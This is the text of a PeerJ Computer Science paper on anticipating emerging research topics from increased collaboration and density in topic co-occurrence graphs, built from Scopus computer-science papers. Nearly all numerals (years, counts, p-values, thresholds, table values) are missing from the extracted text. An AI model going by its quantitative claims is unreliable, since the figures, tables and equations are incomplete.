peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new possibilities and maybe shaping a new emerging area. in the same way, as pointed out by salatino ( ), we can hypothesize a wide array of relevant patterns of activity, which could anticipate the creation of a new research area. these may include a new collaboration between two or more research communities (osborne, scavo & motta, ), the creation of interdisciplinary workshops, a rise in the number of experts working on a certain combination of topics, a significant change in the vocabulary associated with relevant topics (cano basave, osborne & salatino, ), and so on. in this paper we present a study that aims to uncover key elements associated with the research dynamics preceding the creation of novel topics, thus providing initial evidence to support our hypotheses. in particular, our study provides evidence that the emergence of a novel research topic can be anticipated by a significant increase in the pace of collaboration between relevant research areas, which can be seen as the ‘parents’ of the new topic. our study was performed on a sample of three million publications in the – interval. it was conducted by comparing the sections of the co-occurrence graphs where new topics are about to emerge with a control group of subgraphs associated with established topics. these graphs were analysed by using two novel approaches that integrate both statistics and semantics. we found that the pace of collaboration and the density measured in the sections of the network that will give rise to a new topic are significantly higher than those in the control group. these findings support our hypothesis about the existence of an embryonic phase and also yield new empirical evidence consistent with the aforementioned theories in philosophy of science. in addition, the identified dynamics could be used as the starting point for developing new automatic methods, which could detect the emergence of a new research topic well before this becomes explicitly recognised and established. the study presented in this paper is an extension of the work by salatino & motta ( ). the new contributions of this paper are: ( ) a larger sample including debutant topics and established ones, ( ) a new technique for measuring the density of the topic graph, ( ) a more exhaustive statistical analysis, including a comparison of the different approaches, ( ) a revised state of the art, and ( ) a more comprehensive discussion of the findings. the rest of the paper is organized as follows. we first review the literature regarding the early detection of topics, pointing out the existing gaps. we then describe the experimental approach used for the study, present the results and discuss their implications. finally, we summarize the main conclusions and outline future directions of research. related work topic detection and tracking is a task that has drawn much attention in recent years and has been applied to a variety of scenarios, such as social networks (cataldi, di caro & schifanella, ; mathioudakis & koudas, ), blogs (gruhl et al., ; oka, abe & kato, ), emails (morinaga & yamanishi, ) and scientific literature (bolelli, ertekin & giles, ; decker et al., ; erten et al., ; lv et al., ; osborne, scavo & motta, ; sun, ding & lin, ; tseng et al., ). the literature presents several works on research trend detection, which can be characterised either by the way they define a topic or the techniques they use detect it salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (salatino ( ). blei, ng & jordan, ( ) have developed the well-known latent dirichlet allocation (lda), an unsupervised learning method to extract topics from a corpus, which models topics as a multinomial distribution over words. since its introduction, lda has been extended and adapted to several applications. for example, blei & lafferty ( ) have introduced the correlated topic model using the logistic normal distribution instead of the dirichlet one, to address the issue that lda fails to model correlations between topics. griffiths et al. ( ) have developed the hierarchical lda, where topics are grouped together in a hierarchy. further extensions incorporate other kinds of research metadata. for example, rosen-zvi et al. ( ) present the author-topic model (atm), which includes authorship information and associates each topic to a multinomial distribution over words and each author to a multinomial distribution over topics. bolelli, ertekin & giles ( ) introduce the segmented author-topic model which extends atm by adding the temporal ordering of documents to address the problem of topic evolution. in addition, chang & blei ( ) have developed the relational topic model which combines lda and the network structure of documents to model topics. similarly, he et al. ( ) have combined lda and citation networks in order to address the problem of topic evolution. their approach detects topics in independent subsets of a corpus and leverages citations to connect topics in different time frames. in a similar way, morinaga & yamanishi ( ) employ a probabilistic model called finite mixture model to represent the structure of topics and analyse the changes in time of the extracted components to track emerging topics. however, their evaluation rests on an email corpus, thus it is not clear how it would perform on scientific corpus. a general issue affecting this kind of approaches is that it is not always easy to associate clearly identifiable research areas to the resulting topic models. in addition to lda, the natural language processing (nlp) community have proposed a variety of tools for identifying topics. for example, chavalarias & cointet ( ) used cortext manager to extract a list of n-grams representing the most salient terms from a corpus and derived a co-occurrence matrix on which they performed clustering analysis to discover patterns in the evolution of science jo, lagoze & giles ( ) developed an approach that correlates the distribution of terms extracted from a text with the distribution of the citation graphs related to publications containing these terms. their work assumes that if a term is relevant to a topic, documents containing that term will have a stronger connection than randomly selected ones. this approach is not suitable for topics in their very early stage since it takes time for the citation network of a term to become tightly connected. duvvuru et al. ( ) have analysed the network of co-occurring keywords in a scholarly corpus and monitored the evolution in time of the link weights, to detect research trends and emerging research areas. however, as osborne & motta ( ) pointed out, keywords tend to be noisy and do not always represent research topics—in many cases different keywords even refer to the same topic. for example, osborne, scavo & motta ( ) showed that a semantic characterisation of research topics yields better results than keywords for the detection of research communities. to cope with this problem, some approaches rely on taxonomies of topics. for example, decker et al. ( ) matched a corpus of research papers to a taxonomy of topics based on the most significant words found in titles and abstracts, salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and analysed the changes in the number of publications associated with such topics. similarly, erten et al. ( ) adopted the acm digital library taxonomy for analysing the evolution of topic graphs and monitoring research trends. however, human crafted taxonomies tend to evolve slowly and, in a fast-changing research field, such as computer science (pham, klamma & jarke, ), it is important to rely on constantly updated taxonomies. for this reason, in our experiment we adopted an ontology of computer science automatically generated and regularly updated by the klink- algorithm developed by osborne & motta ( ). in brief, the literature comprises a wide collection of approaches for detecting research trends. however, they focus on already recognised topics, which are either already associated with recognized label or, in the case of probabilistic topics models, with a set of terms that have previously appeared in a good number of publications. detecting research trends at an embryonic stage remains an open challenge. materials and methods the aim of this study was to measure the association between the emergence of a new topic and the increase of the pace of collaboration and density previously observed in the co- occurrence graphs of related topics. to this end, we represent topics and their relationships in a certain time frame as a graph in which nodes are topics and edges represent their co- occurrences in a sample of publications. this is a common representation for investigating topic dynamics (boyack, klavans & börner, ; leydesdorff, ; newman, ). in the following we will refer to it as topic graph or topic network. we analysed topics that debuted in the – period using established topics as a control group. in our previous work (salatino & motta, ), we conducted a similar analysis on a smaller sample. the sample analysed in this paper was selected by iteratively adding new topics until we reached data saturation (fusch & ness, ), i.e., the results of the analysis did not vary significantly with the inclusion of new data points. in the following sections, we will describe the dataset, the semantically enhanced topic graph, and the methods used to measure the pace of collaboration and the density of the subgraphs. the raw data and the results of this study are available at https://osf.io/bd ex/. semantic enhanced topic network we use as dataset the metadata describing three million papers in the field of computer science from a dump of the well-known scopus dataset (https://www.elsevier.com/ solutions/scopus). in this dataset each paper is associated to a number of keywords that can be used to build the topic graph. however, as pointed out in osborne & motta ( ), the use of keywords as proxies for topics suffers from a number of problems: some keywords do not represent topics (e.g., case study) and multiple keywords can refer to the same topic (e.g., ontology mapping and ontology matching). the literature offers several methods for characterizing research topics. probabilistic topic models, such as lda, are very popular solutions, which however are most effective in scenarios where fuzzy classification is acceptable, there is no good domain knowledge and salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://osf.io/bd ex/ https://www.elsevier.com/solutions/scopus https://www.elsevier.com/solutions/scopus http://dx.doi.org/ . /peerj-cs. it is not important for users to understand the rationale of a classification. however, these tenets do not apply to this study. furthermore, it is not easy to label the topics produced by a probabilistic topic model with specific and distinct research areas. conversely, in this study it is important to be able to associate topics with well-established research areas. a second approach, used by several digital libraries and publishers is tagging publications with categories from a pre-determined taxonomy of topic. some examples include the acm computing classification system (http://www.acm.org/publications/class- ), the springer nature classification (http://www.nature.com/subjects), scopus subject areas (https://www.elsevier.com/solutions/scopus/content), and the microsoft academic search classification (http://academic.research.microsoft.com/). this solution has the advantage of producing sound topics, agreed upon by a committee of experts. however, these taxonomies suffer from a number of issues. first, building large-scale taxonomies requires a sizable number of experts and it is an expensive and time-consuming process. hence, they are seldom updated and grow obsolete very quickly. for example, the version of the acm classification was finalized fourteen years after the previous version. in addition, these taxonomies are very coarse-grained and usually contain general fields rather than fine-grained research topics. we addressed these issues by characterizing our topics according to the computer science ontology (cso) produced by klink- (osborne & motta, ), which describes the relationships between more than , research areas extracted from a corpus of million publications. klink- is an algorithm that is able to generate very granular ontologies and update them regularly by analysing keywords and their relationships with research papers, authors, venues, and organizations, and by taking advantage of multiple knowledge sources available on the web. klink- is currently integrated in the rexplore system (osborne, motta & mulholland, ), a platform for exploring and making sense of scholarly data, which provides semantic-aware analytics. we used the cso ontology to semantically enhance the co-occurrence graphs by removing all keywords that did not refer to research areas and by aggregating keywords representing the same concept, i.e., keywords linked by a relatedequivalent relationship in the ontology (osborne, motta & mulholland, ). for example, we aggregated keywords such as ‘‘semantic web’’, ‘‘semantic web technology’’ and ‘‘semantic web technologies’’ in a single semantic topic and we assigned it to all publications associated with these keywords. we built sixteen topic networks representing topic co-occurrences in the – timeframe. each network is a fully weighted graph gyear=(vyear,eyear), in which v is the set of topics while e is the set of links representing the topic co-occurrences. the node weight represents the number of publications in which a topic appears in a year, while the link weight is equal to the number of publications in which two topics co-occur in the same year. graph selection we randomly selected topics that debuted in the period between and as treatment group (also referred to as debutant group). a topic debuts in the year in which its label first appears in a research paper. the control group (also referred to as non-debutant salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.acm.org/publications/class- http://www.nature.com/subjects https://www.elsevier.com/solutions/scopus/content http://academic.research.microsoft.com/ http://dx.doi.org/ . /peerj-cs. figure evolution of the topic software agents in terms of number of authors and number of publi- cations per year. the chart has been produced using the rexplore system. figure workflow representing all the steps for the selection phase. group), was obtained by selecting well-established topics. we considered a topic as well-established if: (i) it debuted before , (ii) it appears in the cso ontology, (iii) it is associated each year with a substantial and consistent number of publications. as an example, fig. shows the evolution through time of the well-established topic software agents, in terms of number of active authors and publications. the figure shows that the topic made its debut in and in the year reached a rate of over publications per year with more than , authors working on it. it can thus be considered established in the context of our study. we assume that a new topic will continue to collaborate with the topics that contributed to its creation for a certain time after its debut. this assumption was discussed and tested in a previous study (osborne & motta, ), where it was used to find historical subsumption links between research areas. hence, as summarized in fig. , for each debutant topic we salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. extracted the portion of topic network containing its n most co-occurring topics from the year of debut until nowadays and analysed their activity in the five years preceding the year of debut. since we want to analyse how the dimension of these subgraphs influences the results, we tested different values of n ( , , and ). for example, if a topic a made its debut in , the portion of network containing its most co-occurring topics is analysed in the – timeframe. we repeated the same procedure on the topics in the control group, assigning them a random year of analysis within the decade – . in the previous study (salatino & motta, ), we selected established topics and assigned a random year of analysis to each of them. for this study, we randomly assigned each established topic to two consecutive years within the decade – , with the consequence of doubling the control group, thus reducing noise and smoothing the resulting measures. in brief, the selection phase associates to each topic in the treatment and control groups (also referred as input topics) a graph: gtopic=gtopicyear− ∪g topic year− ∪g topic year− ∪g topic year− ∪g topic year− . ( ) this graph corresponds to the co-occurrence network of a debutant topic in the five years prior to its emergence (or year of analysis for non-debutant topics). in particular, each year corresponds to the sub-graphs: gtopicyear−i=(v topic year−i,e topic year−i) ( ) in which v topicyear−i is the set of most co-occurring topics in a year and e topic year− is the set of edges linking the nodes in the set. the graphs associated to the debutant topics included , unique topics, while the ones associated to the control group included , topics. graph analysis we assess the dynamics in the graphs with two main approaches: clique-based and triad- based. the first transforms the graph in -cliques, associates to each of them a measure reflecting the increase in collaboration between relevant topics and then averages the results over all -cliques. the second measures the increase in the topic graph density using the triad census technique (davis & leinhardt, ). in the following two sections we describe both methods in details. clique-based method we measure the collaboration pace of a graph by analysing the diachronic activity of triangles of collaborating topics. to this end, we first extract all -cliques from the five sub-graphs associated to each topic under analysis. a -clique, as shown in fig. , is a complete sub-graph of order three in which all nodes are connected to one another and is employed for modelling small groups of entities close to each other (luce & perry, ). to study the dynamics preceding the debut of each topic, we analyse the evolution of the same -clique in subsequent years. figure summarizes the process. considering a -clique having nodes {a,b,c}, we quantify its collaboration index µ in a year by taking salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. wa wb wc wab wac wbc a b c figure an instance of a -clique containing node and link weights. figure main steps of the analysis phase. into account both node weights {wa,wb,wc} and link weights {wab,wbc,wca}. µa−b=mean(p(a|b),p(b|a)) µb−c =mean(p(b|c),p(c,b)) µc−a=mean(p(c|a),p(a|c)) µ =mean(µa−b,µb−c,µc−a). ( ) the index µ is computed by aggregating the three coefficients µa−b, µb−c and µc−a as illustrated by eq. ( ). the strength of collaboration µx−y between two nodes of the topic network, x and y, is computed as the mean of the conditional probabilities p ( y|x ) and p(x|y), where p(y|x) is the probability that a publication associated with a topic x will be associated also with a topic y in a certain year. the advantage of using conditional probabilities instead of the number of co-occurrences is that the value µx−y is normalised with respect to the number of publications associated to each topic. finally,µ is computed as the mean of the strengths of collaboration of the three links in a -clique. this solution salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. h h h h empty one edge two-star triangle figure the four isomorphism classes of triad. the triad census counts the frequencies of hi in the input graph. was adopted after testing alternative approaches during the preliminary evaluation, as discussed in the results section. the evolution of the -clique collaboration pace can be represented as a timeline of values in which each year is associated with its collaboration pace, as in eq. ( ). we assess the increase of the collaboration pace in the period under analysis by computing the slope of the linear regression of these values. µ clique−i time =[µ( yr− ),µ( yr− ),µ( yr− ),µ( yr− ),µ( yr− )]. ( ) initially, we tried to determine the increase in the collaboration pace exhibited by a clique by simply taking the difference between the first and last values of the timeline (µ yr− −µ yr− ). however, this method ignores the other values in the timeline and can thus neglect important information. for this reason, we applied instead the linear interpolation method on the five measures using the least-squares approximation to determine the linear regression of the time series f (x)=a ·x+b. the slope a is then used to assess the increase of collaboration in a clique. when a is positive, the degree of collaboration between the topics in the clique is increasing over time, while, when it is negative, the number and intensity of collaborations are decreasing. finally, the collaboration pace of each sub-graph is measured by computing the mean of all slopes associated with the -cliques. to summarize, for each input topic we select a subgraph of related topics in the five years preceding the year of debut (or analysis for topics in the control group). we then extract the -cliques and associate each of them with a vector representing the evolution of their pace of collaboration. the trend of each clique is computed as the angular coefficient of the linear regression of these values. finally, the increase in the pace of collaboration of a subgraph is obtained by averaging these values. triad-based method the triad-based method employs the triad census (davis & leinhardt, ) to measure the change of topology and the increasing density of the subgraphs during the five year period. the triad census of an undirected graph, also referred to as global -profiles, is a four-dimensional vector representing the frequencies of the four isomorphism classes of triad, as shown in fig. . salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table frequencies of hi obtained performing triad census on the debutant topic ‘‘artificial bee colonies’’. graph h h h h gtopicyear− gtopicyear− , gtopicyear− gtopicyear− , gtopicyear− the triad census summarises structural information in networks and is useful to analyse structural properties in social networks. it has been applied to several scenarios, such as identifying spam (kamaliha et al., ; o’callaghan et al., ), comparing networks (pržulj, ), and analysing social networks (faust, ; ugander, backstrom & kleinberg, ). in this study, we use triad census to describe all the sub-graphs associated to a input topic in terms of frequencies of hi (see fig. ) and we then evaluate how the frequencies of empties (h ), one edges (h ), two-stars (h ) and triangles (h ) change in time. figure illustrates the four classes of triads for an undirected graph in the case of topic networks. an increase in the number of triangles suggests the appearance of new collaboration clusters among previously distant topics. in contrast with the -cliques approach, the triad census does not consider the weight of the links, but only their existence. hence, it is useful to assess how the inclusion of links with different strengths affects the analysis. to this end, we performed three experiments in which we considered only links associated with more than , and topic co-occurrences. we initially perform the triad census over the five graphs associated to each input topic. for example, table shows the results of the triad census over the five sub-graphs associated with the debutant topic artificial bee colonies. next, we check whether the co-occurrence graph is becoming denser by analysing the change of frequencies associated with hi (see fig. ). we first calculate the percentage growth of each hi (eq. ( )) and then compute their weighted summation (eq. ( )). we label the resulting metric the growth index. we empirically tested other solutions for aggregating the various contributions (e.g., considering only h , summing the values, weighting the sum in a variety of ways) and found that this definition of growth index provides the best discrimination between the two classes of graphs. %growthhi= (hyr− i −h yr− i )∗ hyr− i ( ) growing indextopic= ∑ i= i·%growthhi. ( ) the growth index takes into account the contributions from h , h and h . although, the number of triangles (h ) can by itself be a fair indicator of the density, previous studies showed that all four classes of triads are useful for computing network properties, salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. y e a r - y e a r - y e a r - y e a r - y e a r - fr eu q en ci es o f tr ia d s graphs h h h h figure development in time of the frequencies of hi in the network related to the emergence of ‘‘ar- tificial bee colonies’’. including transitivity, intransitivity and density (faust, ; holland & leinhardt, ). taking into consideration only h might fail to detect some subtler cases, characterized for example by a contemporary increase of h and decrease of h . to summarize, the triad-based method receives the same input as the clique-based method. for each of the five subgraphs associated to a topic, we perform the triad census obtaining the different frequencies, hi, in different years. we then analyse them diachronically to quantify the increase in density. results in this section we report the results obtained by analysing the debutant and control groups using the previously discussed methods. we will describe: • the preliminary evaluation performed on a reduced dataset for assessing the metrics used in the clique-based method; • the full study using the clique-based method; • the full study using the triad-based method. preliminary evaluation with alternative clique-based methods we conducted a preliminary evaluation aiming at choosing the most effective clique-based method for assessing the pace of collaboration. this test focused on the subgraph of the most co-occurring topics associated with the topic semantic web (debuting in ) and cloud computing ( ) versus a control group of subgraphs associated to a group of non-debutant topics. we tested on this dataset two techniques to compute the weight of a clique (harmonic mean and arithmetic mean) and two methods to evaluate its trend salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. - - . . . - - . . . am-n debutant am-n non-debut. am-cf debutant am-cf non-debut. hm-n debutant hm-n non-debut. hm-cf debutant hm-cf non-debut.p a ce o f co ll a bo ra ti o n experiments figure overall directions of the sub-graphs related to input topics in both debutant and control group with all four approaches. (computing the difference between the first and the last values and linear regression). hence, we evaluated the following four approaches: • am-n, which uses the arithmetic mean and the difference between first and last value; • am-cf, which uses the arithmetic mean and the linear regression coefficient; • hm-n, which uses the harmonic mean and the difference between first and last value; • hm-cf, which uses the harmonic mean and the linear regression coefficient. figure illustrates the average pace of collaboration for the sub-graphs associated with each topic according to these methods and the range of their values (thin vertical line). the results support the initial hypothesis: the pace of collaboration of the cliques within the portion of network associated with the emergence of new topics is positive and higher than the ones of the control group. interestingly, the pace of collaboration of the control group is also slightly positive. further analysis revealed that this behaviour is probably caused by the fact that the topic network becomes denser and noisier in time. figure confirms this intuition illustrating the fast growth of the number of publications per year in the dataset during the time window – . the approaches based on the simple difference (am-n and hm-n) exhibit the larger gaps between the two groups in terms of average pace of collaboration. however, the ranges of values overlap, making it harder to assess if a certain sub-group is incubating a novel topic. the same applies to am-cf. hm-cf performs better and, even if the values slightly overlap when averaging the pace over different years, they do not when considering single years. indeed, analysing the two ranges separately in and (see fig. ), we can see that the overall collaboration paces of the debutant topics (db) are always significantly higher than the control group (ndb). with the null hypothesis: ‘‘the differences in the pace of collaboration between the debutant topics and topics in the control group result purely from chance’’, we ran student’s t-test on the sample of data provided by the hm-cf approach, to verify whether the two salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we consider p< . as a conventional statistical representation to indicate an ex- tremely high statistical significance (> times stronger than the conventional . threshold for claiming significance). it includes all mathematical outcomes below . , which are essentially equivalent in assessing excellent significance. n u m be r o f pa pe rs th o u sa n d s year figure number of papers each year in the period – in the dataset under analysis. - . - . . . . . db ndb db ndb pa ce o f co ll a bo ra ti o n experiments figure overall directions of the sub-graphs related to input topics in both debutant and control group in hm-cf approach. groups belong to different populations. the test yielded p < . , which allowedt us to reject the null hypothesis that the differences between the two distributions were due to random variations. based on this result, we could further confirm that the hm-cf approach performs better compared to the other approaches. for this reason, we selected the combination of harmonic mean and linear regression as the approach for the full study using the clique-based method. the results of hm-cf give interesting insights on the creation of some well-known research topics. tables and list the cliques that exhibited a steeper slope for semantic web and cloud computing. we can see that semantic web was anticipated in the – timeframe by a significant increase in collaboration of the world wide web area with topics such as, information retrieval, artificial intelligence, and knowledge based systems. this is salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table ranking of the cliques with highest slope value for the ‘‘semantic web’’. topic topic topic slope world wide web information retrieval search engines . world wide web user interfaces artificial intelligence . world wide web artificial intelligence knowledge representation . world wide web knowledge based systems artificial intelligence . world wide web information retrieval knowledge representation . table ranking of the cliques with highest slope value for the ‘‘cloud computing’’. topic topic topic slope grid computing distributed computer systems web services . web services information management information technology . grid computing distributed computer systems quality of service . internet quality of service web services . web services distributed computer systems information management . consistent with the initial vision of the semantic web, defined in the by the seminal work of berners-lee, hendler & lassila ( ). similarly, cloud computing was anticipated by an increase in the collaboration between topics such as, grid computing, web services, distributed computer systems and internet. this suggests that our approach can be used both for forecasting the emergence of new topics in distinct subsections of the topic network and also for identifying the topics that gave rise to a research area. clique-based method study we applied the clique-based methods on the subgraphs associated to topics in the treatment and control groups. figure reports the results obtained by using subgraphs composed by the , and topics with the highest co-occurrence. each bar shows the mean value of the average pace of collaboration for the debutant (db) and non-debutant (ndb) topics. as before, the pace computed in the portion of the network related to debutant topics is higher than the corresponding pace for the control group. since the pace of collaboration shows significant changes within the period considered, we studied its behaviour across the – interval. figures a– c, show the average yearly collaboration pace when considering the , and most co-occurring topics. in all cases the collaboration pace for the debutant topics is higher than the one for the control group. we can also notice that in the last five years the overall pace of collaboration suffered a fall for both debutant and non-debutant topics. this may be due to the fact that the topic network became denser and noisier in the final years of the interval. moreover, the most recent debutant topics often have an underdeveloped network of co-occurrences, which may result in a suboptimal selection of the group of topics to be analysed in the previous years. therefore, simply selecting the most co-occurring topics may not allow us to highlight the real dynamics preceding the creation of a new topic. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. - . . . . . . . db ndb db ndb db ndb pa ce o f co ll a bo ra ti o n experiments figure average collaboration pace of the sub-graphs associated to the treatment (db) and control group (ndb), when selecting the , and most co-occurring topics. the thin vertical lines repre- sent the ranges of values. table compares the collaboration pace of debutant topics with the collaboration pace of the control group in the same year. we can see how the appearance of a good number of well-known topics, which emerged in the last decade, was anticipated by the dynamics of the topic network. the student’s t-test confirmed that the debutant and established topics do not belong to the same population (p< . ). the results of the t-test also suggest that the experiment involving the most co-occurring topics, represented in fig. c, provides a better discrimination of debutant topics from non-debutant ones. for the sake of completeness, in table we report the p-values yielded by each experiment. in conclusion, the results confirm that the portions of the topic network in which a novel topic will eventually appear exhibit a measurable fingerprint, in terms of increased collaboration pace, well before the topic is recognized and labelled by researchers. triad-based method study we applied the triad-based methods on the subgraphs composed by the most co- occurring topics, since this configuration provided the best outcomes in previous tests. we performed multiple tests by filtering links associated with less than , and co-occurrences, to understand how collaboration strength influences the outcome. figure a reports the average value of the growth indexes when discarding links with less than co-occurrences. the approach allows us to discriminate well the portion of networks related to debutant topics from the ones related to the control group. in particular, the density of network associated with the debutant topics is always higher than its counterpart. figsures b and c report the results obtained by removing links with less than and co-occurrences. as in the previous experiment, we adopted the student’s t-test to salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. - . . . . . . . . pa ce o f co ll a bo ra ti o n year debutant non debutant - . . . . . . . . pa ce o f co ll a bo ra ti o n year debutant non debutant - . . . . . . . . pa ce o f co ll a bo ra ti o n year debutant non debutant a) b) c) figure average collaboration pace per year of the sub-graphs related to input topics in both debu- tant and control groups considering their (a), (b) and (c) most co-occurring topics. the year refers to the year of analysis of each topic. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table collaboration pace of the sub-graphs associated to selected debutant topics versus the average collaboration pace of the control group in the same year of debut. topic (year of debut) collaboration pace standard collaboration pace service discovery ( ) . . ontology engineering ( ) . . ontology alignment ( ) . . service-oriented architecture ( ) . . smart power grids ( ) . . sentiment analysis ( ) . . semantic web services ( ) . . linked data ( ) . . semantic web technology ( ) . . vehicular ad hoc networks ( ) . . mobile ad-hoc networks ( ) . . p p network ( ) . . location based services ( ) . . service oriented computing ( ) . . ambient intelligence ( ) . . social tagging ( ) . . community detection ( ) . . cloud computing ( ) . . user-generated content ( ) . . information retrieval technology ( ) . . web . ( ) . . ambient assisted living ( ) . . internet of things ( ) . . table p-values obtained performing the student’s t-test over the distributions of both debutant and control groups considering their , and most co-occurring topics. the best result is bolded. experiment p-value associated chart most co-occurring topics . · − fig. a most co-occurring topics . · − fig. b most co-occurring topics . · − fig. c understand among the three tests which one could provide better discrimination between the two classes of topics. the results of the t-test suggest that the experiment in which we discard links with less than three co-occurrences provides a better discrimination of debutant topics from non-debutant ones. this suggests that considering weak connections is more beneficial for discriminating the two groups. the peak is caused by the debut of a number of topics associated with particularly strong underlying dynamics, such as linked data, pairing-based cryptography, microgrid and privacy preservation. table reports as an example the triad census performed over the subgraph associated with the topic semantic web technologies (swt) debuting in . we can see an increase salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the results of the triad census performed on the network associated with the debutant topic ‘‘semantic web technology’’ removing links associated with less than (left), (right) and (bottom) publications. removing links < removing links < removing links < graph h h h h h h h h h h h h , , , , , , , , , , , , , , in the number of triangles (h ) and two-stars (h ), mirroring the increasing density of the topic network. again, this phenomenon is more evident when also using weak links (< ). the percentage of growth of full triangles is % in the first test and then it decreases to % (< ) and % (< ). table shows a selection of debutant topics and their growth indexes compared with the growth index of the control group in the same year. if we can compare this table to table , we can see that the two methods used in this study reflect the same dynamics. with the null hypothesis ‘‘the differences in growth index between the debutant topics and topics in the control group result purely from chance’’, we ran student’s t-test over the two distributions of growth indexes, for all three experiments. it yielded p< . for all the experiments. more details about the computed p-values per each experiment performed in this triad-based study can be found in table . figure shows, as an example, the distributions associated to the two groups of topics obtained in the first test. hence, the results from this second experiment confirm our initial hypothesis too. in addition, per table , the results from the t-test also suggest that the first experiment, which ignores the links associated with less than three publications, better discriminates the two populations. discussion we analysed the topic network with the aim of experimentally confirming our hypothesis that the emergence of new research areas is anticipated by an increased rate of interaction of pre-existing topics. we examined the pace of collaboration (via the clique-based method) and the change in topology (via the triad-based method) in portions of the network related to debutant topics, showing that it is possible to effectively discriminate areas of the topic graph associated with the future emergence of new topics. the first experiment showed that the subgraphs associated with the emergence of a new topic exhibit a significantly higher pace of collaboration than the control group of subgraphs associated with established topics. similarly, the second experiment showed that the graphs associated with a new topic display a significantly higher increase in their density than the control group. we can thus confirm that these two aspects can play a key role in the context of defining methods for detecting embryonic topics. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. d en si ty o f n et w o rk year debutant non debutant d en si ty o f n et w o rk year debutant non debutant - d en si ty o f n et w o rk year debutant non debutant a) b) c) figure average growth index per year of the sub-graphs related to the topics in both debutant and non-debutant groups considering their most co-occurring topics and filtering links having with less than (a), (b) and (c) publications. salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table growth indexes of sub-graphs associated to selected debutant topics versus the average growth index of the control group in the same year of debut (standard growth index). topic (year of debut) growth index standard growth index service discovery ( ) . . ontology engineering ( ) . . ontology alignment ( ) . . service-oriented architecture ( ) . . smart power grids ( ) . . sentiment analysis ( ) . . semantic web services ( ) . . linked data ( ) . . semantic web technology ( ) . . vehicular ad hoc networks ( ) . . mobile ad-hoc networks ( ) . . p p network ( ) . . location based services ( ) . . service oriented computing ( ) . . ambient intelligence ( ) . . social tagging ( ) . . community detection ( ) . . cloud computing ( ) . . user-generated content ( ) . . information retrieval technology ( ) . . web . ( ) . . ambient assisted living ( ) . . internet of things ( ) . . table p-values obtained performing the student’s t-test over the distributions of both debutant and control groups considering their most co-occurring topics filtering links having with less than , and publications. the best result is bolded. experiment p-value associated chart less than publications . · − fig. a less than publications . · − fig. b less than publications . · − fig. c interestingly, the ability of the two approaches in discriminating the debutant group from the control group varies with the time interval considered. it appears that the clique-based approach (see fig. ) discriminates them more effectively in the initial period, whereas the triad-based method (fig. ) seems to perform better in the central years ( – ). we intend to investigate in future work if these behaviours are associated with specific characteristics of the network. the results of these two experiments allow us to effectively discriminate specific sections of the topic graph and suggest that a significant increase in the rate of collaboration salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − . . . . . . . . growth index p e r c e n ta g e o f g r o w th in d e x debutant non debutant figure distributions of growth indexes for both groups when filtering links associated with less than three publications. between existing topics provides a strong indicator for predicting the emergence of new research areas. even a simple threshold over the indexes introduced in this study allows us to discriminate well the subgraphs that will produce new research areas. for example, table reports the pace of collaboration obtained for both debutant and non-debutant topics in . here we can appreciate that a . threshold corresponding to a % precision is able to retrieve out of debutant topics. table displays other cases in which it is possible to obtain a very good recall when choosing a threshold corresponding to % precision. the application of this technique in a realistic setting would however require a scalable method for identifying promising topic graphs. while these results are satisfactory, our analysis presents some limitations, which we shall address in future work. in particular, we identified the relevant subgraph during the selection phase simply by selecting the n most co-occurrent topics of the topic under analysis. this solution allows us to compare graphs of the same dimension, however it introduces two issues. first of all, it assumes that all topics derive from the same number of research areas, which is an obvious simplification. emerging topics may have a different nature, based on their origin, development patterns, interactions of pioneer researchers, and so on. therefore, each of them will be linked to a different number of established research areas. a manual analysis of the data suggests that using a constant number of co-occurring topics is one of the reasons why the overall pace of collaboration and growth index associated with the emergent topics are not much higher than the ones of the control group. when salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table list of topics, both debutant and non-debutant with their pace of collaboration analysed in the . testing topic pace of collaboration debutant/control linked data . d bilinear pairing . d wimax . d separation logic . d phishing . d micro grid . d privacy preservation . d vehicular ad hoc networks . d mobile computing . c electromagnetic dispersion . c online learning . c wavelet analysis . c program interpreters . c zigbee . d natural sciences computing . c knowledge discovery . c fuzzy neural networks . c three term control systems . c table precision and recall when choosing particular thresholds for distinguish the classes of topics. year threshold . . . recall / / / precision / / / selecting too many co-occurring topics, we may include less significant research areas or, alternatively, research areas that started to collaborate with the topic in question only after its emergence. conversely, when selecting too few topics, the resulting graph may exclude some important ones. a second limitation is that the selection phase performed in our study cannot be reused in a system capable of automatically detecting embryonic 